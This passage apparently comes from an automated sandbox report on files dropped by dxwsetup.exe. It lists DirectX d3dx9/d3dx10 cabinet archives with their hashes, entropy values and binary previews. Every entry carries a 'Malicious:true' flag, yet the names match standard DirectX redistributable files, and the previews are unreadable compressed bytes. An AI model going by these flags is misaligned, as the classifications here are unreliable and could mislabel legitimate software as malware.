                                                                                              SHA-512:86DF72D5B15396ACB504C1AC9DE7FF5C0CC9C95A90FDD82DAEDC55BAAD490CC47A71CB511571D37E25DD9BC1EE9652B9723E33879BC1756A7881A8E61EBC59ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....u......D............................u...#..............H.............C4.F .d3dx9_29_x86.cat..#.......C4hE .d3dx9_29.dll......#...C4hF .d3dx9_29_w9x.inf.....x.#...C4hF .d3dx9_29_x86.inf.......#...C4iF .feb2006_d3dx9_29_x86.inf.w.6..>..CK..X.[...C.Q...1XQ.N..........T,..D .$....c.]......#..{.z..]..E....}...?......f.=..=.g.....v..]F.Y3j...8...&....V..S=S.f...1]aQ......a...1..Q...V.....m..e........s..m.[c.....yl.{/.^%q.Z.I ..hg..DH..........$..........AB.....!N.w=!F.g. .s.p.B...X...LL..X.c ....z.B...........b.81...>:/b..*.....511A..[.&.3vo.'.V)..kgjb...\..|..!(.i..%#...8..9U*m..]_.E...c.o.{....|j..r4..CN..2....K..].t.E..CH.2b}I.A_.D...5s.e....K..&..*.n.K....a..p.$29...o.HN..[..k...d......1V.....P..9..e.....p9...c=..RQ .7.H61.e ......I~.v.....p}:.1.:r.i....qb..@K.......AM.(.QM....%.p....+.9....~.J~.J~.J~.....-....`.0LLl...3nL.....t.f/...x.9......n....I/!.!V..X........S,OU..`.tt..u$i...*]...`.6...o..(..).-..tD.....L.B.S.+c.:.Z.n......od<..

                                                                                              C:\Windows\msdownld.tmp\AS44F9C6.tmp\Apr2006_d3dx9_30_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1109261 bytes, 5 files, at 0x44 +A "d3dx9_30_x86.cat" +A "d3dx9_30.dll", flags 0x4, ID 6903, number 1, extra bytes 20 in head, 74 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1118429
                                                                                              Entropy (8bit):7.999050518080374
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:OreyPa6AC8e290lruGDhi3TSvHDh+ISNvRNhPmJ0RRuu:cNoeYEuTSvjh+R3WKRv
                                                                                              MD5:B3D644A116C54AFDA42A61B0058BE112
                                                                                              SHA1:9AF7DDC29EEF98810A1A2F85DB0B19B2EC771437
                                                                                              SHA-256:CA7B9C6A49E986C350147F00A6C95C5B577847B5667B75681A1EE15E3A189106
                                                                                              SHA-512:A2D2F12B7B37BD8F5C8465DD13AD31942DF11EE5ED5423DEEEB178E6B594587706D2C5116258BE1562CAA5ECA691358AF3CB83B77898D1012FF521017D199165
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............J..............44f .d3dx9_30_x86.cat..p$........4.e .d3dx9_30.dll......$....4.e .apr2006_d3dx9_30_x86.inf.....z.$....4.e .d3dx9_30_w9x.inf.....+.$....4.e .d3dx9_30_x86.inf.v..[>..CK..X.K..=.. ....+..MBI.. M@.n..QH0....#....c..b/..{.z....E..y.......N8?gg..{..=..{...W..;..:....IA.....a.`.......43GX..r..,.f...+FA..,.....2..a0..2......Z.ty.Ih...m0w..es0Ww.[/.n%q.Z.I...ho......#...G.....\.. 1.P6....;.s.cZ.......t.B...X...LL..X.C.......B.......~......@..!..8..O..O..!mR..fbb.0.8L.f..XO.R.-......Y...y...Q4."5JD...p..s.T.f.2z.6..~...........9VPR.f.BH=.bg.s,.T.!=......O..........B...||}...X..5]R.0.....c.+.4..S....E.7.y...[....3...2$..:qt...7T......Q..@X..Ji...q.Z8.Ea(..@zS.D.3;.b..a.}L.;..PG/-....(...../vL_...@K....c..&....f..y.....3.8fW:.T:N7..W:..t.t...#(.FK.k..X..&...;_...Be.w.....b6.z<..za..}_7.afQ......O{,..Thu...).'+..0{:.V}kI.&Z.JU&&*...B..[.'..t.vK.9.`]..!.)Vht.8e.\.T.....i......I.

                                                                                              C:\Windows\msdownld.tmp\AS4504E2.tmp\Oct2006_d3dx9_31_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1121257 bytes, 5 files, at 0x44 +A "d3dx9_31_x86.cat" +A "d3dx9_31.dll", flags 0x4, ID 6911, number 1, extra bytes 20 in head, 75 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1130449
                                                                                              Entropy (8bit):7.9990817245216945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fd5gyP75nbAgKdWsTLSCs3BZnH50ve35Jxroo6DS:F5fP75nbt0STRZn9nxrb5
                                                                                              MD5:F778928C9EB950EF493857F76A5811AD
                                                                                              SHA1:EA82D97077534751297AE0848FB1672E8F21E51E
                                                                                              SHA-256:4891E2DEA9D1798F6A89308E58C61A38E612F8433301EA2376AE14C3DFCB3021
                                                                                              SHA-512:1F382A287FC6763B8E8D66825E8256DFB7D0DEAD6B6A6B51DD7C4A5C86D536CC7EF4128BE0CE495FE17C859018750072DC7B43E3476D1BA435F209CC4EB6D43F
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............K.............<5m. .d3dx9_31_x86.cat...$.......<5.. .d3dx9_31.dll.......$...<5.. .d3dx9_31_w9x.inf.......$...<5.. .d3dx9_31_x86.inf.......$...<5.. .oct2006_d3dx9_31_x86.inf.j5o.s>..CK..\....oh"....Fl..'.......i.*vC..... `..w...6.....`.....;..E..........l.w.3....Y,..+......yg.a.....$.`0...6...XZ4.FX..J...l.V..o;F^..lH....3'.f0..G.m..P.[>...G..j..c^....p.<OAO.N.q.Z.E...hk..H...'@../.B.....q`K...y"..-9.r.'.9...x.O.R.8.......c....`Gc..C....>......X.......|0c..tz......./....-.faa.0..<,.V.^X..B......:/...y...3...X.GZ..T......Bi[.KY.x..A...3.[...s..l..J..U..h.../2Z"7......k....yB.E^.r....T........K.....,...X..)..C...z4.....b......o..yv5.!5...CD`&.\.<0..P.y9..e..`{m8..K.:(.....w..la..@.++.N... .y6.m.......,.c...[lc....d..AM.6........ .P...uD.........m...........m.e.`9t..+..aa..@5.y}r.\..rJ.={9f...3...fO4.u.V6u-z.....t.n..*.A..0%.T....L'.[K...Uh....Ul....vum.........N.U..).)Q...x.RaPk5..X3z.e...

                                                                                              C:\Windows\msdownld.tmp\AS450DAC.tmp\Dec2006_d3dx9_32_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1568416 bytes, 4 files, at 0x44 +A "d3dx9_32_x86.cat" +A "d3dx9_32.dll", flags 0x4, ID 5512, number 1, extra bytes 20 in head, 105 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1577608
                                                                                              Entropy (8bit):7.999092247669469
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:VKo9fY3tlVm3JjPueurZ8zQbC88LHhpu97Sm:V13BFurZ8U18uSm
                                                                                              MD5:A5BEAD938AFDC63ADFECC1DAF5049D7F
                                                                                              SHA1:B3D5BF56F6B9BF87C33009A088BA7785B6363B4E
                                                                                              SHA-256:A1CC7603302EE53D54F4353C223D95E223706924D99B864220B13814EF93EEFB
                                                                                              SHA-512:C9244BBCFE60F347EC8785B1A41B6E243153624EA73B16DB4D624239A69FA76D2DF2E54039D8F4D2C495890AC17B676E390F796118B4E16D9F03683247190362
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............i..............5.a .d3dx9_32_x86.cat..G4.......}5.h .d3dx9_32.dll......f4....5.` .d3dx9_32_x86.inf.M....i4....5.` .dec2006_d3dx9_32_x86.inf.4.$G.@..CK..\.K..?.........7...a....4.... @..LB. `..b..;......{/.;.g7A......}......uv.3.....9X....:.G...`.eT..p...X,..V..C]c.....3^aV......n.*.3..N.0K3s..%.eb...e../...7..$.~.e#+...<....=..U...R...<..I8..H.D..L.. 1.!........np..\...a...D.'....@(:./.A..{...H.e...b...4Y.c.<..P...H..............].;gl.$q.........}..%,.g.....X.C...*HAUZQ1..C.PM.v.\q...T.0Y.3.a.#.\!...O........A)...K....\....PF.X..te...P...B....).).V.(]Jt...A}.S.t|1S#z....\}./.....\..............(..0....'}..N.]......y,..~.R....f.P.E.T....d#.k.b..`P.../..0W.K&....!.!........M......EL&..bBA.b....q.H.Q.5..5..u....{.ka.k.s.PA^.e.5....c#......d...2..).V.e....2.^.;.....L.....s.`.iK...Q..N.Q.%.T......k..M...U...d...H.W..f.I......kF;X..;.%..N.....j.....6......L.T.).JU"["..`....1..........D.QO,..

                                                                                              C:\Windows\msdownld.tmp\AS451741.tmp\Apr2007_d3dx9_33_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1600079 bytes, 5 files, at 0x44 +A "d3dx9_33_x86.cat" +A "d3dx9_33.dll", flags 0x4, ID 7180, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1609247
                                                                                              Entropy (8bit):7.999284261824255
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:4cQY0tIpwa5ydxGuruluTsRWo1Iq9e5m98yiN9/0rjVH60mPxr/1MQK:4cIIi+G9rul8uooec98yi//0rjoDZrCF
                                                                                              MD5:A5915EC0BE93D7EEBE8800CE761EE6DC
                                                                                              SHA1:E8BBC21C2B5F0E5801286F07E3DA09DBC67C3961
                                                                                              SHA-256:EFA2E6DE548401376A575E83A79DE019AA38F191D63FDEF3BD2B07D8CB33E3D7
                                                                                              SHA-512:02259FF3C8478CBA134A8F8408AA624B7165CED97C0AED8C9626034599DD5439F84D1AF9EEFC4191898B0A524E5FFAFB9875EC00E740CEBE97EAC4C2DD0E31AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Oj......D...........................Oj...#..............l....(.........6{. .d3dx9_33_x86.cat.hW5..(....l6O. .d3dx9_33.dll.\.....5....6B. .apr2007_d3dx9_33_x86.inf.....\.5....6B. .d3dx9_33_x86.inf.,...g.5....6B. .d3dx9_33_x86_xp.inf.6^]Z.;..CK.y<.....Y.[.J..".<3..K.AJ.CQa.&a..-.L.vE...")[e..!E)e...(q.W).g..t...?.....Ws^...|.9...9.=.3..L.XN.U.&... ...L.p.b ..,....$.BJp@0.....@#.x^D*...T.`~N./J~... ..A6..Tj.....s.....a...A.....#YV..`&B.m...!"....O.h.x.....!M ..e. k@...$C.7..F...7.%...............C".Xk..V..Y...*..9...B>.n......J..<......{..w.MORA....v...H..l%.....`...;l.:..T@'Y]..9,H.`.,....A.....u..p.a.....D./!..VZ..1P..I......C..........9..4..1.z......h....W...~.}"hK.m..sA..}<;..w...,8.[a.y.!X...HM....qf.!....i.~.m`.O5...T&......2?...,%#.YCTh......H....@.a........?....7..}.+.c.S.\...-.%`.......1...5......24..........5.....yy-v..R.......{.C*..@"....n..C.I.`.ZX....@.MH.*.+9Q[.|.rD.j ...A.(.Vb.ZZx.f......F..}h..X....~[.Cs.S|....RV9JT.k.....c....C...

                                                                                              C:\Windows\msdownld.tmp\AS452153.tmp\Apr2007_d3dx10_33_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 689905 bytes, 6 files, at 0x44 +A "d3dx10_33_x86.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 9049, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):699073
                                                                                              Entropy (8bit):7.998968028413629
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SHwziN1v34WzSc6IA6ajvY8ov8ZdReUTQ8Mr47JYCophIa9sNDn1QcILtw6:V01wWzCI3ajjls4NpAsNDnMw6
                                                                                              MD5:F784B8A0FD84C8AC3F218A9842D8DA56
                                                                                              SHA1:FB7B4B0F81CD5F1C6A900C71BFD4524AF9A79ECE
                                                                                              SHA-256:949068035CE57BBB3658217EC04F8DE7A122C6E7857B6F8B0CA002EB573DF553
                                                                                              SHA-512:01B818AA5188CDE3504E289AEDCA2D31A6C5AED479B18A2C78271828AE04BEBCD4082051B7F4EECA8A31E8EE5ADBA158420ECDCB21371C735E4781EE5F661DBF
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............Y#..............#..............1....).........6{. .d3dx10_33_x86.cat.p%...)....l6O. .d3dcompiler_33.dll.h...2O....o6=. .d3dx10_33.dll............6E. .apr2007_d3dx10_33_x86.inf.I...7......6E. .d3dx10_33_x86.inf.i..........6E. .d3dx10_33_x86_xp.inf..j"(.2..CK.y<...........l.al..)e.!a.&...l3.-.h....j.,."D.R..O...%W).gFn........}.z5..<s..s>.s>..|...U*x...Z..!..E..U...<$.....y0.sPH)....<..<.4.M.@...U.......\).@..6.'.Yi.!.....R.@.&..X..i..z..Y....`...C...).Cz...p.9H$...t@....I.s....;.[.C+A"..<.7.w3..A..u...s8$....ma.Y5.3.e C.e.yAAP ...@L..8.,?..h.a..E2=..9=.......e5|a./3B"q....Zh.P...6P.."....k....:.w..:.h%.....H.0u......+..D.+!..-...9.sD...O...QZ.a..8v#......Q..N..l%....c..?P..........>.....~......0.F.VB!1ii..v5.4.R.R.....LX.X.........w.8.'.~..p.8.......A......6w.\...~..[.B.E.!..h....uQR..q.....O.....R......Cth-.....$z..B..00.l.Uo.. '..m..fB..}...ij....<..RX._......k .k1.xH......A3y.<~V>.s^gV.8+.;+...CP..+. &.....PH..).UA{...E..

                                                                                              C:\Windows\msdownld.tmp\AS4528C5.tmp\Jun2007_d3dx9_34_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601326 bytes, 5 files, at 0x44 +A "d3dx9_34_x86.cat" +A "d3dx9_34.dll", flags 0x4, ID 7195, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610494
                                                                                              Entropy (8bit):7.999066428256981
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ZBdkB3TM+mIf4qyM0iJRy3QvQDxPYKhatPJZcg9QwJeYX34eq2F37kRVeLbdiL3q:ZPU3TMXxDVI3vQ2KSBP4YH4aAELbdK3q
                                                                                              MD5:FE8FEB215FAE59866DCD68C1604D97AA
                                                                                              SHA1:CEDACA678D15E78AA458B965ABB467E8964A1FAB
                                                                                              SHA-256:1C1E1C6F68BA556A0AF09A38C32EB421C543A4848C4B42D25867C98DAB3B3A50
                                                                                              SHA-512:9955336B561E4FD3BA3DA7FC086643E811048A25A7E68344D2CC5CAB091980BAAE1C04CE41328B59C896662E2875886B78EC869852B2D1DAAA46AF38C894A3F2
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....o......D............................o...#..............l....(.........6.. .d3dx9_34_x86.cat.h_5..(.....6.. .d3dx9_34.dll.......5....6.. .d3dx9_34_x86.inf.,.....5....6.. .d3dx9_34_x86_xp.inf.\...7.5....6.. .jun2007_d3dx9_34_x86.inf.A.".l>..CK..\...;T.D...1.(.`...2CH..........`.UD.....b.;va.;*6...w.{.f.l..9.....w?..=k....=.;..........Zh.....<m--.....^..:.z.#_g.~.>.Z.Z..C..|...5..J.P..JKK.(.0...>+.G..~.hy{c....b2.,..!..?E.&.j.1.u.=.1.B...q...p..>...q.Y....x..\6.uB......>........A..A.f.1..{v.Z...F.F.|:.[.Z!..@$.IA.H""ET.J.c.........d..G.....\...xco.#.G......`k?d..E..s...B,........O.0(?..r.......TD..y.W..FkkkC+i...&..!@... ..xP_>(#!...b.O.>,P.8d......lM>..R-t...[.lm2.WS|.u..._.K/.3.3.~.1a....+*....q....o.M.O>o..Y...O*/..B.y_...V..5..5..$#~.+.H..5.B.tu...../.......|.[.(5q.YT5...II..@K._.d0.@M (.U.p...J.!Q_....5.....O....?].k.)..3.u.an}*.....6A. .]].....rg....Z.0...}...u.....*P$g*eq.*.]t/......e.JE."VE.(...LhNu..(...L!g.0...:m:...V(T4~.*^...2...y

                                                                                              C:\Windows\msdownld.tmp\AS4532A9.tmp\Jun2007_d3dx10_34_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692512 bytes, 6 files, at 0x44 +A "d3dx10_34_x86.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 9065, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701680
                                                                                              Entropy (8bit):7.9989902264021255
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SuBBWP1krfKO0BZwB6ux8hBXsRbD3RazqgwLdJPMqHy7qdXCyhUW3zE:DBTrZ0BZwV8fXsprRaxsDBHyWdXg5
                                                                                              MD5:19383CBADA5DF3662303271CC9882314
                                                                                              SHA1:123C97C33F7EF2BA345B220450F181D440412E6B
                                                                                              SHA-256:8EC971C91040618338AC2369188F3E5D7C85A5B1E3B9FC8E752DD845D295CDBA
                                                                                              SHA-512:A4C6ACC9FF656E05D75AE0081C65C200B584209C99FD001494C4D206F2CE8A78D2DD3644E51018574928F3B9E9373BF7EC8C5147A3590B54D1C6D50E61342853
                                                                                              Malicious:true
                                                                                              Preview:MSCF.... .......D...............i#.......... ....#..............1....).........6.. .d3dx10_34_x86.cat.p)...).....6.. .d3dcompiler_34.dll.h...2S.....6.. .d3dx10_34.dll.I..........6.. .d3dx10_34_x86.inf.i..........6.. .d3dx10_34_x86_xp.inf.c...L......6.. .jun2007_d3dx10_34_x86.inf.....{5..CK.|.|......m:..s66...$.\.-K2...B....-.%..\...zI....-.@...!@..<Z(.@..B..@.?..'.k.......f.67;;;;3..gQi....O.7..F....J.m........".z.=.;9.s.D........P...PV.\.U.D......M...3.{K.k>...[z.u#Q...D,..%.%.$j,@wDT..D..]................8\.S.....X*......$....q..pP>.0.8.(q.IQ..;GGq.H.@...z.F...~(...=............W...9....._A.qtt.D:[.......7D...&..N..ee.J....H..LeS,e...CY....K m..9..\....._.e....E..@R..J)p..~e...I......uA..8<>).X.#....P..O.BN...a9#I})RW..J4P./.i.'..v.Po..5.+K...[..+K..2... `]....@............q.($. <B$...8@..b<." ...b.y..,.<..OK.."*..t..q...{^..5..l........J.(Q.o.Yn.]z.:x6.T..J.Z..zG........ .W..-..l.....2.\O..f/.......TJ&W"S$*.2.@.2.a.*....C.......A...{..!.|. ....UVJ7.#.\T..k..

                                                                                              C:\Windows\msdownld.tmp\AS4539AE.tmp\Aug2007_d3dx9_35_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1702192 bytes, 5 files, at 0x44 +A "d3dx9_35_x86.cat" +A "d3dx9_35.dll", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1711360
                                                                                              Entropy (8bit):7.999186916403002
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:91jqFBu+YTN2MuQ4R6dPnknsGmQA+re+1ZGD+rCbaNHy196aqlF35RJT1q/P0a+8:9FyMTN57+MPO++rB44S1I/F35zhqFR
                                                                                              MD5:3ED592E6CDAE66B1C0671D9EC417A738
                                                                                              SHA1:9F083FFE00A8E5EABF282130CD16044B488B6E0D
                                                                                              SHA-256:4914D2B5C3251B00C0CC236F51AFE469728D92B50C953C66D213F079AC928EAC
                                                                                              SHA-512:0144DD9A83F953EABAAFF3C41F17A363100C9A2CCD932321A4AFE990D8FCB5A430E842DE9146C983409B6366CD974E318A535E6475B10839A6679844CB7D23B7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....0.......D...........................0....#..............s....(.........6P. .d3dx9_35_x86.cat.h.8..(.....6. .d3dx9_35.dll.\.....9....6B. .aug2007_d3dx9_35_x86.inf.....\.9....6B. .d3dx9_35_x86.inf.,...g.9....6B. .d3dx9_35_x86_xp.inf..n_.;..CK.y<.....Y.[.J.f.d.;c..l...."a..2&&[..E.BEY.EZl.%Z.(..%.+%I....3.[}...q..s?..|.w..=.s.s..y..2.S8y..........L.8.....0| .'.. .....LD.'.2'..c.ya.L.a...........C.....C.....^...T..x,.j.X....\.......2a2H.<`.`.c@. BwM(a.#..P....&[R.... $.B.....{....\....5.<$...q.t..qp..c.Z.*.J...DK...d...A@.....:t...^...X.....K...zg>......U.A..#..1v....`'d..d......A.Bf.@y.$a.d.....,.2W.=."t..........".p8.%......C.0....l.F.*.....X.Q......R.....]...c..Y.Y.<t.'...}.........gK....of...........8Gv6......O.....N!d.?...E...g3a....`...G.R2..-@.6@......\..`H$...4...&...g.6..M.........r2K.s.....FM(......}....hCJVC.T.y..@...C...d..Yk.L`....D..L....>d#.08\.h....&...&......ox...4.2......'*K....R...(E.*..@..6RH..A..t.1 ......s........).T..\.G..........w...

                                                                                              C:\Windows\msdownld.tmp\AS4543EF.tmp\Aug2007_d3dx10_35_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 790907 bytes, 6 files, at 0x44 +A "d3dx10_35_x86.cat" +A "d3dcompiler_35.dll", flags 0x4, ID 9055, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):800075
                                                                                              Entropy (8bit):7.9986813742013325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:iTo6mZ4UtaxS5hNsXjnUQEnnR62vSNE6xr8M6:iTdwtqAUXjU7nQaSNvxo
                                                                                              MD5:DDC4AF0D53B477E5AF77942E7118B66E
                                                                                              SHA1:81AD8201DCF653A6E977C4506A274D0BAC12643C
                                                                                              SHA-256:9536166EE7CC1100CFE24E01532E8E4DEED6BAA838B4C025581F2CA046A25915
                                                                                              SHA-512:1E082D7E7855BC0AF6EC09D4A69FD4A1B0A3A31E4DE8FAA52FA0BDCD601C501ADA6216DDDB83058F37AB4A371068E0F344BDF42F2551943BE19BD719D99BA93C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....{.......D..............._#..........{....#..............8....).........6P. .d3dx10_35_x86.cat.p....).....6. .d3dcompiler_35.dll.h...2......6. .d3dx10_35.dll.c..........6F. .aug2007_d3dx10_35_x86.inf.I..........6F. .d3dx10_35_x86.inf.i...F......6F. .d3dx10_35_x86_xp.inf.. ......CK.y8............H.<3.1....=...`.&&[...m^...&D.l.%Z.TJ).....%.R..L...z.....{u]..<...y.....qn...e5\..1.1.....L.b.*D".x~....4....@0.....@#XD>D&.].T..........K..,.<(.81A.z.]..A....0.......Y.l......F[.C...R.`...8...$...A....2..8-..F..e.=j.J.ud..dM.I.........!.h..l.+..,....t9..r..!_h.D.. ..,3..hQsQnYE.+V.wL....;.....3#B"...Zh'...........2.Hx.....:2.%......:.&..'... .!.H.%.<..Tj......A3C.W..e....Dpe...]....!....&H.....I..~d...$C }.>.#...}3....X}.F..G!1....r6...WD.....L}.K..t.....)#...6.L.&...........)....9.!p.b....x.....{..f........s.a.U..^..,..3?.............Ck.....!.s.......`.oZk............K[i.g.....E7...f.7f...`.....3...F.....i.?K&.....d.,Yk.L...........,.L...D.Au..].8.

                                                                                              C:\Windows\msdownld.tmp\AS454B80.tmp\Nov2007_d3dx9_36_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1703400 bytes, 5 files, at 0x44 +A "d3dx9_36_x86.cat" +A "d3dx9_36.dll", flags 0x4, ID 7211, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1712568
                                                                                              Entropy (8bit):7.999078652914364
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fMb9V3TN8vuaBYlFhEbpdjRsI+CpoUjrn++qWYxhiUX21LVpmI9P2BZbcNU7YBP1:kJEvlmFMpdj/Npocz++q3X2tnLAcm0Bt
                                                                                              MD5:C5E127067EE6CACDD2F8962E6005542E
                                                                                              SHA1:22C571E4DA75A6E5DFE02E3E3587F40C2939C745
                                                                                              SHA-256:F52CC1304B533083B3FC5553C49433C0E4E46D66D567B9DE0B558CA518DB1544
                                                                                              SHA-512:E70DF11AF8CB5D51C3111B8327371EA40292580F06D7D265F2449B89A4941C4740BDE904367FBCB4158512939BBD7C7A3DC20D3642475789FC075A2AE8E27860
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............+................#..............s...>'........V7.. .d3dx9_36_x86.cat...8.>'....L7.y .d3dx9_36.dll.....F#9...V7O. .d3dx9_36_x86.inf.,...Q&9...V7O. .d3dx9_36_x86_xp.inf.\...}(9...V7O. .nov2007_d3dx9_36_x86.inf..*G~.;..CK..TS..._....E..)...!4...iR.....Z."] .."......K..T@.B.....]....|...w......y...w.3w..7..//s..R3...H.N{/..F.Yj..J..@..a^.........,.a.^M....".!.,T>......T. .h..-..]./.8.^..../%..q0....x..',4.....Y.9...2..!+...!]Pp.J.`...=.B.W<(.........d.d.l/.Xq,9}9> ..l.}....@......R.dY.x.8@.(..C!.?...)....f.-a.l.+6..U..vbO.q.%]s.....H...$g.... .=...l8. X2.I@.b....Y.V"...[..f5{.$`K.e3.....PE;.Nx`@.f..$....r...i>[..$]`A.:.....jv~.gg...Y....M.....x7...H..'.J.y..oV......j.aU...fc....U..i.....B.q..N>...`........`H9XVN.r..![.+..!H...B..i.-....r...f`l....V.?{.z..H.Ym../.o...Q...p....<d..,....9.7O..c....d.<.`.L..!..{...b .>.QH..)..B.........,...Hx..$a8N.^.rE.+Z..c#h...Xu..,.D"b.h..z$=....G./...l....z./.F..)..v....v':..5....G...... ...p

                                                                                              C:\Windows\msdownld.tmp\AS4555B1.tmp\Nov2007_d3dx10_36_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 797924 bytes, 6 files, at 0x44 +A "d3dx10_36_x86.cat" +A "d3dcompiler_36.dll", flags 0x4, ID 9083, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):807092
                                                                                              Entropy (8bit):7.998858073625772
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:EL+Y8gC2xQcaINcDDHwNXjNOl93uN850V7ZcR0SEDR3l3M:vD2xaINcDHIzhs0Vwz6c
                                                                                              MD5:3D9A0C59156D03DA0F19C2440E695637
                                                                                              SHA1:55B050991CB17410C75ADC3913066BAEDB482ED0
                                                                                              SHA-256:BDF7FB01C02783A4F8C9F5E7911F5CAE3E2A7CBC425B90B36F9EA6EEF2C27DE3
                                                                                              SHA-512:E9A662498C43865E917F0778B772D6964517E41289CBF5A0B8A4E44D8C4B4E9A5049C76F2ECBE4ACC7E9CFCC3F1D87A75C3F8703E66804CE758969814BA14FDA
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....,......D...............{#...........,...#..............8...h(........V7.. .d3dx10_36_x86.cat.....h(....L7.y .d3dcompiler_36.dll.h.... ....B7.O .d3dx10_36.dll.I.........V7P. .d3dx10_36_x86.inf.i...1.....V7P. .d3dx10_36_x86_xp.inf.c.........V7P. .nov2007_d3dx10_36_x86.inf..d.....CK..8.....Y..^(4cK.......H....0..F.]1..$.(W...P.-..J.).[*.%Q....M.v......>Os.c.......=.|.}..d*.r.5....q.s.J..*k8....y89....e...D...Q.!aL./,..l...@~N..J~..)...=..].)......o.@.... ......,R...".@&L.i..........Z.6`..C.......]6.Z.._V..J T.B......l......,..t.6.....md.p..5...l.....B...aI,.F.mU..<T...@Hf.......d{..... ..1.0$.....j.AE..#'..'.%..%....4..p..P.g%..(.H..d..........R#..L..H. mXq..c......6tU$....cii.e............1dA...f.... .........U.B..b.....Fj.z;x...f2. gY.....9.u24. .O&....!E-.....R.d+...5.b..![.dG.....""{U.C...........9p.M....Y|.\f......E....).J...d..0.l.A......0$.....}....e......t..^W..LM(.$,... +.....A..K...f.p..dD...,..E2n..2/k-...d.E2.-.@.S...1.........pA..H..

                                                                                              C:\Windows\msdownld.tmp\AS455D62.tmp\Mar2008_d3dx9_37_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1437322 bytes, 5 files, at 0x44 "d3dx9_37.dll" "d3dx9_37_x86.cat", flags 0x4, ID 7166, number 1, extra bytes 20 in head, 116 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1446490
                                                                                              Entropy (8bit):7.99972380205062
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:vFs/gTzoeHhwLMLDjl5XbCzgxt0Q98wWz35UM0vE03yYCmPI7ik:veKTHhbLDbDP0Q5UUtBC2PAz
                                                                                              MD5:8ED75E3205C2B989FF2B5A7D2F0BA2DF
                                                                                              SHA1:88846203588464C0BA19907C126C72F7D683B793
                                                                                              SHA-256:91A50D9EFCDFBCDF22A91D6FBB0F50D3C2AA75F926D05CC166020BF7AAF30E28
